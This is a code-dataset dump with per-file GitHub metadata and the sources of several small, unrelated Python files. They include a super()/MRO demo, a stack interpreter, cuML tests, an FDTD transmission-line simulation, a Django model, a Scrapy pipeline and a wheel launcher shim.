blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cef272c84d2416ecb65b2c9f24ab13e451d85b70
|
daeba3d908791f0feedb04afbd36f350f7fdaffe
|
/super/super_usage01.py
|
6d9b60ab0fed0d9731f96711c64c5f8f0eaa9a8c
|
[] |
no_license
|
alanwooo/lab
|
03295de1a04f5736f0312aebaeb302bdb687ff97
|
d7f2697bb411ce39d8e61104f0593506e62fc7c0
|
refs/heads/master
| 2021-01-17T08:27:51.142468
| 2020-03-10T05:56:11
| 2020-03-10T05:56:11
| 65,275,751
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 688
|
py
|
# python3.5
# Demonstrates cooperative multiple inheritance: because every
# __init__ calls super().__init__(), construction follows each
# instance's MRO (C3 linearization), not the textual base order.
class A:
    def __init__(self):
        print ("in A")
        print ("out A")


class B(A):
    def __init__(self):
        print ("in B")
        super().__init__()  # next class in the instance's MRO
        print ("out B")


class D(B):
    def __init__(self):
        print ("in D")
        super().__init__()
        print ("out D")


class C(B):
    def __init__(self):
        print ("in C")
        super().__init__()
        print ("out C")


# MRO of E is [E, C, D, B, A]: inside E(), C's super() call reaches D
# (its MRO successor) even though D is not a base class of C.
class E(C, D, B):
    def __init__(self):
        print ("in E")
        super().__init__()
        print ("out E")


class F(D):
    def __init__(self):
        print ("in F")
        super().__init__()
        print ("out F")


# F() nests F -> D -> B -> A; E() then shows the diamond-shaped order.
f = F()
print ('\n\n\n')
e = E()
|
[
"herobzyy@gmail.com"
] |
herobzyy@gmail.com
|
955d3f259f31f1eb653a375005ec6f630af12c82
|
023f7dc61aaa75ac1b9d4a5a63b3e35e9c0c4f9c
|
/p10/p10.py
|
5e253d411ed8638078b65bc5aeac8e06210bb795
|
[] |
no_license
|
JoseTomasTocino/tuenti-challenge-2012
|
23d0519fd8192b0d55ab8cef1dbc84e86b2f48fa
|
20fa081d49db0571e4093b6ecbb13cdd9508ae15
|
refs/heads/master
| 2021-01-22T07:27:35.474194
| 2012-05-06T17:11:48
| 2012-05-06T17:11:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,777
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-

# Copyright (C) 2011 José Tomás Tocino García <theom3ga@gmail.com>
# Autor: José Tomás Tocino García

# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.

# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.

import sys


# NOTE: Python 2 source (print statements below) — a toy Forth-style
# stack interpreter: integers are pushed, named tokens are operators.
def main():
    """Read whitespace-separated tokens from stdin, one program per
    line, and evaluate them against a fresh operand stack per line.
    """
    for line in sys.stdin:
        elements = filter(None, line.strip().split())
        res = 0  # NOTE(review): never read afterwards — dead variable
        operands = []
        for e in elements:
            # Forth programming language
            # Numeric tokens are pushed onto the stack.
            try:
                n = int(e)
                operands.append(n)
                continue
            except ValueError:
                pass
            # "." pops and prints the top of the stack.
            if e == ".":
                print operands.pop()
            # Sign change (negate the top of the stack)
            elif e == "mirror":
                n = operands.pop()
                operands.append(-n)
            # Duplicate the top operand (Forth DUP)
            elif e == "breadandfish":
                operands.append(operands[-1])
            # Discard the top operand (Forth DROP)
            elif e == "fire":
                operands.pop()
            # Swap the two topmost operands (Forth SWAP)
            elif e == "dance":
                n1 = operands.pop()
                n2 = operands.pop()
                operands.append(n1)
                operands.append(n2)
            # Modulo
            elif e == "conquer":
                n1 = operands.pop()
                n2 = operands.pop()
                operands.append(n2 % n1)
            # Subtraction
            elif e == "$":
                n1 = operands.pop()
                n2 = operands.pop()
                operands.append(n2 - n1)
            # Division (Python 2 "/" is floor division for ints)
            elif e == "&":
                n1 = operands.pop()
                n2 = operands.pop()
                operands.append(n2 / n1)
            # Addition
            elif e == "@":
                n1 = operands.pop()
                n2 = operands.pop()
                operands.append(n2 + n1)
            # Product
            elif e == "#":
                n1 = operands.pop()
                n2 = operands.pop()
                operands.append(n2 * n1)


if __name__ == '__main__':
    main()
|
[
"jose@minty.(none)"
] |
jose@minty.(none)
|
3f3244a1de687250b0c8157664915e60fdef8dfb
|
497ead1ee1e09a2530aa771ae059989e341684d7
|
/python/cuml/tests/test_adapters.py
|
16dd1fce1a2a7d226cfdd6bc421dff8539280e07
|
[
"Apache-2.0"
] |
permissive
|
xieliaing/cuml
|
193f5753696bbfd4de8e3eaef919c18da2fd1d1a
|
78092ddde28d5a810e45d6186f049c1309121408
|
refs/heads/master
| 2022-11-10T16:45:38.818055
| 2022-11-03T23:12:07
| 2022-11-03T23:12:07
| 159,592,316
| 0
| 0
|
Apache-2.0
| 2018-11-29T01:59:07
| 2018-11-29T01:59:07
| null |
UTF-8
|
Python
| false
| false
| 7,586
|
py
|
#
# Copyright (c) 2020-2022, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
import cupy as cp
import cupyx as cpx
import numpy as np
from cupyx.scipy.sparse import coo_matrix
from scipy import stats
from cuml.thirdparty_adapters.adapters import check_array, \
_get_mask as cu_get_mask, \
_masked_column_median, \
_masked_column_mean, \
_masked_column_mode
from sklearn.utils._mask import _get_mask as sk_get_mask
from cuml.thirdparty_adapters.sparsefuncs_fast import \
csr_mean_variance_axis0, \
csc_mean_variance_axis0, \
_csc_mean_variance_axis0, \
inplace_csr_row_normalize_l1, \
inplace_csr_row_normalize_l2
from cuml.testing.test_preproc_utils import assert_allclose
from sklearn.preprocessing import normalize as sk_normalize
@pytest.fixture(scope="session",
                params=["zero", "one", "nan"])
def mask_dataset(request, random_seed):
    """Yield (mask_value, host_copy, device_array): a 500x20 float64
    matrix of random ints in [0, 30) with ~30% of its entries replaced
    by the parametrized mask value (0, 1 or NaN).
    """
    cp.random.seed(random_seed)
    randint = cp.random.randint(30, size=(500, 20))
    randint = randint.astype(cp.float64)
    if request.param == 'zero':
        mask_value = 0
    elif request.param == 'one':
        mask_value = 1
    else:
        mask_value = cp.nan
    # Pick 30% of the flat positions without replacement and mask them.
    random_loc = cp.random.choice(randint.size,
                                  int(randint.size * 0.3),
                                  replace=False)
    randint.ravel()[random_loc] = mask_value
    # .get() materializes a NumPy copy for the sklearn reference path.
    return mask_value, randint.get(), randint
@pytest.fixture(scope="session",
                params=["cupy-csr", "cupy-csc"])
def sparse_random_dataset(request, random_seed):
    """Yield (host_dense, device_dense, host_sparse, device_sparse) for
    a 100x10 uniform random matrix with ~30% of its entries zeroed,
    converted to the parametrized sparse format (CSR or CSC).
    """
    cp.random.seed(random_seed)
    X = cp.random.rand(100, 10)
    random_loc = cp.random.choice(X.size, int(X.size * 0.3),
                                  replace=False)
    X.ravel()[random_loc] = 0
    if request.param == 'cupy-csr':
        X_sparse = cpx.scipy.sparse.csr_matrix(X)
    elif request.param == 'cupy-csc':
        X_sparse = cpx.scipy.sparse.csc_matrix(X)
    return X.get(), X, X_sparse.get(), X_sparse
def test_check_array():
    """Exercise check_array's validation switches one at a time."""
    # accept_sparse: sparse input passes only when explicitly allowed
    sparse_in = coo_matrix((3, 4), dtype=cp.float64)
    check_array(sparse_in, accept_sparse=True)
    with pytest.raises(ValueError):
        check_array(sparse_in, accept_sparse=False)
    # dtype: kept when matching, converted when requested
    int_arr = cp.array([[1, 2]], dtype=cp.int64)
    check_array(int_arr, dtype=cp.int64, copy=False)
    float_arr = cp.array([[1, 2]], dtype=cp.float32)
    converted = check_array(float_arr, dtype=cp.int64)
    assert converted.dtype == cp.int64
    # order: output honors the requested memory layout
    fortran_arr = cp.array([[1, 2]], dtype=cp.int64, order='F')
    out = check_array(fortran_arr, order='F')
    assert out.flags.f_contiguous
    out = check_array(fortran_arr, order='C')
    assert out.flags.c_contiguous
    # force_all_finite: inf rejected unless disabled
    with_inf = cp.array([[1, cp.inf]])
    check_array(with_inf, force_all_finite=False)
    with pytest.raises(ValueError):
        check_array(with_inf, force_all_finite=True)
    # ensure_2d: 1-d input rejected unless disabled
    one_d = cp.array([1, 2], dtype=cp.float32)
    check_array(one_d, ensure_2d=False)
    with pytest.raises(ValueError):
        check_array(one_d, ensure_2d=True)
    # ensure_2d: genuine 2-d input always accepted
    two_d = cp.array([[1, 2, 3], [4, 5, 6]], dtype=cp.float32)
    check_array(two_d, ensure_2d=True)
    # ensure_min_samples
    single_row = cp.array([[1, 2]], dtype=cp.float32)
    check_array(single_row, ensure_min_samples=1)
    with pytest.raises(ValueError):
        check_array(single_row, ensure_min_samples=2)
    # ensure_min_features
    no_features = cp.array([[]], dtype=cp.float32)
    check_array(no_features, ensure_min_features=0)
    with pytest.raises(ValueError):
        check_array(no_features, ensure_min_features=1)
def test_csr_mean_variance_axis0(failure_logger, sparse_random_dataset):
    """csr_mean_variance_axis0 must match numpy's nan-aware mean/var."""
    host_dense, _, _, device_sparse = sparse_random_dataset
    if device_sparse.format != 'csr':
        pytest.skip('Skip non CSR matrices')
    means, variances = csr_mean_variance_axis0(device_sparse)
    assert_allclose(means, np.nanmean(host_dense, axis=0))
    assert_allclose(variances, np.nanvar(host_dense, axis=0))
def test_csc_mean_variance_axis0(failure_logger, sparse_random_dataset):
    """csc_mean_variance_axis0 must match numpy's nan-aware mean/var."""
    host_dense, _, _, device_sparse = sparse_random_dataset
    if device_sparse.format != 'csc':
        pytest.skip('Skip non CSC matrices')
    means, variances = csc_mean_variance_axis0(device_sparse)
    assert_allclose(means, np.nanmean(host_dense, axis=0))
    assert_allclose(variances, np.nanvar(host_dense, axis=0))
def test__csc_mean_variance_axis0(failure_logger, sparse_random_dataset):
    """The internal _csc helper also reports per-column NaN counts."""
    host_dense, _, _, device_sparse = sparse_random_dataset
    if device_sparse.format != 'csc':
        pytest.skip('Skip non CSC matrices')
    means, variances, counts_nan = _csc_mean_variance_axis0(device_sparse)
    assert_allclose(means, np.nanmean(host_dense, axis=0))
    assert_allclose(variances, np.nanvar(host_dense, axis=0))
    assert_allclose(counts_nan, np.isnan(host_dense).sum(axis=0))
def test_inplace_csr_row_normalize_l1(failure_logger, sparse_random_dataset):
    """In-place L1 row normalization must agree with sklearn's normalize."""
    host_dense, _, _, device_sparse = sparse_random_dataset
    if device_sparse.format != 'csr':
        pytest.skip('Skip non CSR matrices')
    inplace_csr_row_normalize_l1(device_sparse)
    expected = sk_normalize(host_dense, norm='l1', axis=1)
    assert_allclose(device_sparse, expected)
def test_inplace_csr_row_normalize_l2(failure_logger, sparse_random_dataset):
    """In-place L2 row normalization must agree with sklearn's normalize."""
    host_dense, _, _, device_sparse = sparse_random_dataset
    if device_sparse.format != 'csr':
        pytest.skip('Skip non CSR matrices')
    inplace_csr_row_normalize_l2(device_sparse)
    expected = sk_normalize(host_dense, norm='l2', axis=1)
    assert_allclose(device_sparse, expected)
def test_get_mask(failure_logger, mask_dataset):
    """cuML's _get_mask must match sklearn's for the same masked value."""
    masked_value, host_arr, device_arr = mask_dataset
    gpu_mask = cu_get_mask(device_arr, value_to_mask=masked_value)
    cpu_mask = sk_get_mask(host_arr, value_to_mask=masked_value)
    assert_allclose(gpu_mask, cpu_mask)
def test_masked_column_median(failure_logger, mask_dataset):
    """Per-column medians over unmasked entries must match numpy's."""
    masked_value, host_arr, device_arr = mask_dataset
    medians = _masked_column_median(device_arr, masked_value).get()
    keep = ~sk_get_mask(host_arr, value_to_mask=masked_value)
    for col in range(device_arr.shape[1]):
        expected = np.median(host_arr[:, col][keep[:, col]])
        assert expected == medians[col]
def test_masked_column_mean(failure_logger, mask_dataset):
    """Per-column means over unmasked entries must match numpy's."""
    masked_value, host_arr, device_arr = mask_dataset
    means = _masked_column_mean(device_arr, masked_value).get()
    keep = ~sk_get_mask(host_arr, value_to_mask=masked_value)
    for col in range(device_arr.shape[1]):
        expected = np.mean(host_arr[:, col][keep[:, col]])
        assert expected == means[col]
def test_masked_column_mode(failure_logger, mask_dataset):
    """Per-column modes over unmasked entries must match scipy.stats.mode."""
    masked_value, host_arr, device_arr = mask_dataset
    modes = _masked_column_mode(device_arr, masked_value).get()
    keep = ~sk_get_mask(host_arr, value_to_mask=masked_value)
    for col in range(device_arr.shape[1]):
        expected = stats.mode(host_arr[:, col][keep[:, col]])[0][0]
        assert expected == modes[col]
|
[
"noreply@github.com"
] |
xieliaing.noreply@github.com
|
ffc6a5ef9fe085d32afb8e7786aaba1a6ab7a4ed
|
97aefba1d8eb779cafbaa46744b436668cb3e544
|
/GenomicSegmentVector.py
|
949bc7bb1c3e4e2871fced213bc48bd2645483d2
|
[] |
no_license
|
ucscCancer/cgDataV2
|
9a6e835aceaf4c0c6f50092a4e76bb4d8127a922
|
82f13fa5a6d57412d39a8773c2cfea830f6f4b8e
|
refs/heads/master
| 2020-05-17T16:55:38.984987
| 2012-07-31T17:29:09
| 2012-07-31T17:29:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,930
|
py
|
import cgDataV2.Exceptions
class GenomicSegmentVector(object):
    """GenomicSegmentVector objects indicate which segments were
    present in the indicated samples, and with what score.  For example,
    copy number data can be represented as GenomicSegmentVectors.

    Each GenomicSegmentVector contains the following fields:
    - sampleId: the name of the sample in which the segment was observed
    - chrom: name of the chromosome
    - start: starting position within the chromosome or scaffold
    - end: ending position within the chromosome or scaffold.
    - strand: either '+' for forward, '-' for reverse, or '.' for both
    - score: floating point score for the segment

    Comment: in the API document, the term "GenomicSegment" seems to
    refer to a file of genomic segment observations.  But I feel like
    there are two different classes: GenomicSegmentVector objects, in
    which each object represents the observation of one segment in one
    indicated sample; and GenomicSegmentSet objects, representing a
    set of GenomicSegmentVectors that are contained together in a
    file.

    See Also: GenomicSegmentSet
    """
    # __format__ = {
    #     "name" : "genomicSegment",
    #     "type" : "type",
    #     "form" : "table",
    #     "columnOrder" : [
    #         "id",
    #         "chrom",
    #         "chrom_start",
    #         "chrom_end",
    #         "strand",
    #         "value"
    #     ],
    #     "groupKey" : "id",
    #     "columnDef" : {
    #         "chrom_start" : { "type" : "int" },
    #         "chrom_end" : { "type" : "int" },
    #         "value" : { "type" : "float" }
    #     }
    # }

    def __init__(self, line=None):
        """Creates a new GenomicSegmentVector object.  If line is
        None, an empty object is returned.  Else, the contents of the
        GenomicSegmentVector are parsed from the line, which should
        contain the indicated fields and be whitespace-delimited.

        As a final initialization step, the object is validated.  If
        validation fails, a ValidationFailed exception is thrown.
        """
        pass  # NOTE(review): unimplemented stub

    def __validate(self):
        """Validate this GenomicSegmentVector, and throw a ValidationFailed
        object if unsuccessful. """
        pass  # NOTE(review): unimplemented stub

    # NOTE(review): declared inside the class but takes (vector1, vector2)
    # with no ``self`` — probably meant as a module-level comparator or a
    # @staticmethod; confirm the intended placement before calling.
    def genomicSegmentVectorCompare(vector1, vector2):
        """Return the results of comparing vector1 to vector2, comparing each field
        (id, chrom, chromStart, chromEnd, strand, value) in the order indicated.
        Use numeric comparison on chromStart, chromEnd, and value, and lexical
        comparison on all other fields."""
        pass  # NOTE(review): unimplemented stub

    def write(self, filehandle, delimiter="\t"):
        """Write a GenomicSegmentVector object to the indicated
        filehandle.  The data is written in tab-delimited format by
        default.
        """
        pass  # NOTE(review): unimplemented stub
|
[
"cline@soe.ucsc.edu"
] |
cline@soe.ucsc.edu
|
d40a97402a952bbd38692329a69dfc90a2057125
|
6e7ad01744a4590da9380ff4cba9c709863fd159
|
/home/models.py
|
60ab83a98285e1b79bbb39c65d32202a987ff228
|
[] |
no_license
|
MDRasel-Al-Mamun/Multi-Image-Upload
|
0312a967a9566635b96bbf8ac4afc27829481524
|
3c81749f405d18c6a5df908d54265ccbfca9d5cf
|
refs/heads/master
| 2023-01-09T13:07:07.371035
| 2020-10-31T04:49:17
| 2020-10-31T04:49:17
| 308,805,905
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 159
|
py
|
from django.db import models
class Doc(models.Model):
    """A single uploaded document; files are stored under MEDIA_ROOT/images/."""

    upload = models.FileField(upload_to='images/')

    def __str__(self):
        """Identify the document by its primary key."""
        return f"{self.pk}"
|
[
"djangoprojectbd@gmail.com"
] |
djangoprojectbd@gmail.com
|
1f8cfb3290576d3377f6f48f96fb1c3d222fc897
|
fa5712725ebaf0d219f9752c24b34ed96c68c242
|
/FDTD-tranmission-lines.py
|
3a4180bf2c8e0ebc950162dc698684cef45cc269
|
[] |
no_license
|
andrebpradof/FDTD-transmission-lines
|
e5811571b9d42c1c3d05aeba445b6be794a3cace
|
b36a7e02bdf8e2325763ed0aeb2a619dc9266246
|
refs/heads/master
| 2022-07-20T13:18:44.046272
| 2020-05-25T01:00:20
| 2020-05-25T01:00:20
| 266,454,392
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,567
|
py
|
# //////////////////////////////////////////////////////////////////
# // SEL0612 - Ondas eletromagneticas (2020) //
# // Trabalho 01 - Linhas de trasmissao //
# // //
# // Alunos: //
# // André Baconcelo Prado Furlanetti - Nº USP: 10748305 //
# // Diego da Silva Parra - Nº USP: 10716550 //
# // Mateus Fernandes Doimo - Nº USP: 10691971 //
# //////////////////////////////////////////////////////////////////
import numpy as np
import math
import matplotlib.pyplot as pyplot
import matplotlib.animation as animation
import scipy.constants as sci
import matplotlib as mpl
#mpl.rcParams['animation.ffmpeg_path'] = 'ffmpeg/bin/ffmpeg.exe' # Usado para salvar as animações
# Dispatch to the source waveform selected by the user.
def fonte(res_fonte, t, l):
    """Return the source voltage at time *t*: waveform 1 (step) when the
    user chose "1", otherwise waveform 2 (pulse of width l/(10*uf))."""
    return Vs1(t) if int(res_fonte) == 1 else Vs2(t, l)
# Unit step (Heaviside) function.
def u(t):
    """Return 1 for t >= 0 and 0 otherwise."""
    return 1 if t >= 0 else 0
# First voltage source: a 2 V step at t = 0.
def Vs1(t):
    """Return 2*u(t): zero before t=0, 2 V afterwards."""
    return 2 * u(t)
# Second voltage source: a 1 V rectangular pulse.
def Vs2(t, l):
    """Return a unit pulse lasting from t=0 to t=l/(10*uf)."""
    return u(t) - u(t - l / (10 * uf))
# Updates the voltage values shown by the animation
def animacao_voltagem(n):
    """FuncAnimation callback: display the voltage snapshot for frame *n*."""
    voltage_plot.set_ydata(V[n])
    return voltage_plot
# Updates the current values shown by the animation
def animacao_corrente(n):
    """FuncAnimation callback: display the current snapshot for frame *n*."""
    current_plot.set_ydata(I[n])
    return current_plot
# Collect the simulation parameters from the user
# Source: 1 --> 2*u(t)   2 --> u(t) - u(t - l/(10*uf))
res_fonte = input("Fonte: 1 ou 2 ? ")
# Load resistance at the end of the line
res_carga = input("Carga: 0, 100 ou inf? ")
l = int(input("Tamanho da linha (l): "))
K = int(input("Numero de interacoes: "))

# Load: short circuit (0), 100 ohm, or open line (inf)
if str(res_carga) == "0":
    Rl = 0
    nome_anim_RL = "0"
elif str(res_carga) == "100":
    Rl = 100
    nome_anim_RL = "100"
else:
    Rl = math.inf
    nome_anim_RL = "Inf"

# Propagation speed of the voltage/current signal
uf = 0.9*sci.speed_of_light
# Total simulated time
tempo_t = 10*l/uf
# Spatial step dz
dz = l/K
# Time step dt
dt = dz/uf*0.2
# Number of time iterations
N = int(tempo_t/dt)
# Characteristic impedance
Zo = 50
# Internal resistance of the voltage source
Rs = 75
# Capacitance and inductance derived from Zo and uf
C = 1/(Zo*uf) #Capacitance
L = Zo/uf #Inductance
# Voltage and current matrices (time x space)
V = np.zeros((N, K)) #Voltage
I = np.zeros((N, K-1)) #Current
# x-axis of the plots
eixo_x = np.array(range(K))*dz
# Steady-state voltage and current (t --> infinity)
V_inf = (Rl*fonte(res_fonte,N*dt,l))/(Rl+Rs)
I_inf = fonte(res_fonte,N*dt,l)/(Rl+Rs)
print("\nResultados:")
print("V∞(z,t) = "+str(V_inf))
print("I∞(z,t) = "+str(I_inf))

# Initial voltage and current conditions (divider between Rs and Zo)
V[0][0] = (Zo*fonte(res_fonte, 0,K*dz))/(Rs+Zo)
I[0][0] = fonte(res_fonte,0, K*dz)/(Rs+Zo)
beta_1 = 2*dt/(Rs*C*dz)
if Rl == 0:
    beta_2 = math.inf
elif Rl == math.inf:
    beta_2 = 0
else:
    beta_2 = 2*dt/(Rl*C*dz)

# FDTD method main loop
for n in range(1,N):
    # Boundary condition for the voltage at the start of the line
    V[n][0] = (1 - beta_1)*V[n-1][0] -2*I[n-1][0] + (2/Rs)*fonte(res_fonte,(n-1)*dt,l)
    # Voltage update along the whole line K
    for k in range (1,K-1):
        V[n][k] = V[n-1][k] - (I[n-1][k]-I[n-1][k-1])
    # Boundary condition for the voltage at the end of the line
    if Rl == 0:
        V[n][K-1] = 0
    else:
        V[n][K-1] = (1 - beta_2)*V[n-1][K-1] + 2*I[n-1][K-2]
    # Current update along the whole line K-1
    for k in range (0, K-1):
        I[n][k] = I[n-1][k] - (dt**2)/(L*C*dz**2)*(V[n][k+1] - V[n][k])
# Rescale the voltage matrix back to volts
V = V*(dt/(C*dz))

################### Animations ###################
# y-axis limits tuned per load/source combination
if Rl == math.inf:
    if int(res_fonte) == 1:
        volt_limite_y = 3
    else:
        volt_limite_y = 2
    corrente_limite_y = 0.04  # NOTE(review): indentation reconstructed; assumed inside the Rl==inf branch — confirm
elif Rl == 0:
    volt_limite_y = 2.2
    if int(res_fonte) == 1:
        corrente_limite_y = 0.06
    else:
        corrente_limite_y = 0.03
else:
    volt_limite_y = 2.2
    corrente_limite_y = 0.04

# Configuring the voltage plot
figure, voltage = pyplot.subplots(1,1)
voltage.grid(True)
figure.patch.set_facecolor('#E0E0E0')
figure.patch.set_alpha(0.7)
voltage_plot, = voltage.plot(np.linspace(0,l,K), V[0], color='b', label='Voltage [V]')
voltage.set_ylim(-1.2, volt_limite_y)
voltage.legend()
voltage.set_ylabel('V(z,t)')
voltage.set_xlabel('z (m)')
voltage.set_title('Voltagem')
#Writer = animation.writers['ffmpeg']
#writer = Writer(fps=15, metadata=dict(artist='Me'), bitrate=1800)
animation1 = animation.FuncAnimation(figure, func = animacao_voltagem, frames=np.arange(0, N, (int)(K/10)), interval = 100, repeat = False)
# To save the animation as .mp4
#animation1.save("Fonte_"+res_fonte+"_voltagem_RL_"+nome_anim_RL+".mp4", writer = 'ffmpeg')

# Configuring the current plot
figure2, current = pyplot.subplots(1,1)
current.grid(True)
figure2.patch.set_facecolor('#E0E0E0')
figure2.patch.set_alpha(0.7)
current_plot, = current.plot(np.linspace(0,l,K-1), I[0], color='g', label='Corrente [A]')
current.set_ylim(-0.025, corrente_limite_y)
current.legend()
current.set_ylabel('I(z,t)')
current.set_xlabel('z (m)')
current.set_title('Corrente')
animation2 = animation.FuncAnimation(figure2, func = animacao_corrente, frames=np.arange(0, N, (int)(K/10)), interval = 100, repeat = False)
# To save the animation as .mp4
#animation2.save("Fonte_"+res_fonte+"_corrente_RL_"+nome_anim_RL+".mp4", writer = 'ffmpeg')

# Show the animations
pyplot.show()
|
[
"andrebpf@usp.br"
] |
andrebpf@usp.br
|
c10a18eb79c5b64d24b77b0797b8913909e5ade6
|
229b5bb81cdaad731b9ab823d4bccc9c2f26c159
|
/todo/models.py
|
0b0da82167b1479423a0ebf278d9890ef665e9d9
|
[] |
no_license
|
kirbyeggs/todosite
|
1d3619e78d4b16d636cee76aef303d93cf53752c
|
c506c4f9ed328e3ed7c6e490e5cfe8c1f734d880
|
refs/heads/master
| 2021-01-10T08:26:23.577811
| 2015-12-02T00:01:44
| 2015-12-02T00:01:44
| 45,493,483
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 468
|
py
|
from django.db import models
from django.core.validators import MinValueValidator
# Create your models here.
class To_do(models.Model):
    """One to-do entry belonging to *username*."""

    # Priority is a positive integer (validated >= 1); defaults to 1.
    priority = models.PositiveSmallIntegerField(validators=[MinValueValidator(1)], verbose_name='Priority', default=1)
    # Creation timestamp, set automatically on insert.
    date = models.DateTimeField(verbose_name='Date', auto_now_add=True)
    description = models.CharField(verbose_name='Description', max_length=200)
    username = models.CharField(max_length=20)
|
[
"kirbyeggs0@gmail.com"
] |
kirbyeggs0@gmail.com
|
897b7d818bbdc047c3a5c7aa83382dce201a5c58
|
b52bf66bef5ce6fdd7f5e0674a625e8719acbac3
|
/01-24/ranking/ranking/pipelines.py
|
54b006523813fa923be6d7c766ce6295db52090c
|
[] |
no_license
|
itarvin/spider
|
18b8ee811f698769bb189557d8b642d39e08f53c
|
a38c4e61c52da630b7103edd4fad5f4b2bf1ccb7
|
refs/heads/master
| 2021-07-06T10:59:12.636360
| 2018-04-23T23:52:34
| 2018-04-23T23:52:34
| 282,765,355
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 768
|
py
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
# 文件处理类库,可以指定编码格式
import codecs
import json
class RankingPipeline(object):
    """Scrapy pipeline that appends every scraped item to 80smovies.json,
    one JSON object per line (UTF-8, non-ASCII characters left readable).
    """

    def __init__(self):
        # Open the output file once per pipeline instance; utf-8 so
        # non-ASCII titles are written unescaped.
        self.filename = codecs.open('80smovies.json', 'w', encoding='utf-8')

    def process_item(self, item, spider):
        """Serialize *item* as one JSON line, write it, and pass it on."""
        content = json.dumps(dict(item), ensure_ascii=False) + "\n"
        self.filename.write(content)
        return item

    def spider_closed(self, spider):
        # Bug fix: the original called ``self.file.close()`` but the handle
        # is stored as ``self.filename`` — closing raised AttributeError
        # and the file was never explicitly flushed/closed.
        self.filename.close()
|
[
"itarvin@126.com"
] |
itarvin@126.com
|
e2db0757093e0a624f48128fa8d25b79ce224b38
|
1e525380cce54ae61b34e0b8ae30c93fe5bfb885
|
/tests/unit/test_buildah.py
|
1d122e0e6a267d90f6ae663dae3961a5b090d355
|
[
"MIT"
] |
permissive
|
TomasTomecek/ansible-bender
|
376d8c760cbb78f52888cefebb56f280c32c585f
|
dffcde94f6fc04de149051444fd62bf0414314b5
|
refs/heads/master
| 2023-04-28T11:44:29.180807
| 2020-04-01T11:32:50
| 2020-04-01T12:42:11
| 176,808,595
| 19
| 2
|
MIT
| 2021-11-19T15:57:11
| 2019-03-20T20:05:15
|
Python
|
UTF-8
|
Python
| false
| false
| 585
|
py
|
import json
from ansible_bender.builders import buildah_builder
from ansible_bender.builders.buildah_builder import get_buildah_image_id
from flexmock import flexmock
from tests.spellbook import buildah_inspect_data_path
def mock_inspect():
    """Replace buildah_builder.inspect_resource with a stub returning the
    canned inspect JSON from the test fixture, so no real buildah binary
    is needed for the tests below."""
    with open(buildah_inspect_data_path) as fd:
        buildah_inspect_data = json.load(fd)
    flexmock(buildah_builder, inspect_resource=lambda x, y: buildah_inspect_data)
def test_buildah_id():
    """With inspection mocked, get_buildah_image_id must return the image
    ID taken from the fixture's inspect data."""
    mock_inspect()
    assert get_buildah_image_id("this-is-mocked") == "6aed6d59a707a7040ad25063eafd3a2165961a2c9f4d1d06ed0a73bdf2a89322"
|
[
"ttomecek@redhat.com"
] |
ttomecek@redhat.com
|
74041fbece6bee0a5c02a587c5b6f1e21ef4dee4
|
267f80e1510e6de06a2c2cf2e2a08d3db8a7811e
|
/venv/bin/wheel
|
52017e250d4f40ac4215328f6160d9c3e2e092d1
|
[
"CC-BY-2.5",
"Apache-2.0"
] |
permissive
|
NalediMadlopha/google-python-exercises
|
ef9503b041fb81bf9401da6db867f208d3ea4e59
|
9ad88c1c539111f0b6dd52109114bde875dacc71
|
refs/heads/master
| 2020-08-07T02:38:47.868274
| 2019-10-06T23:26:34
| 2019-10-06T23:26:34
| 213,258,801
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 276
|
#!/Users/naledi/Workspace/practise/Python/google-python-exercises/venv/bin/python
# -*- coding: utf-8 -*-
# Console-script shim generated by pip/setuptools for the ``wheel`` CLI.
import re
import sys

from wheel.tool import main

if __name__ == '__main__':
    # Strip the "-script.py"/".exe" suffix that Windows launchers append
    # so argv[0] shows the plain command name, then run the wheel CLI
    # and propagate its exit status.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
|
[
"naledi.madlopha@gmail.com"
] |
naledi.madlopha@gmail.com
|
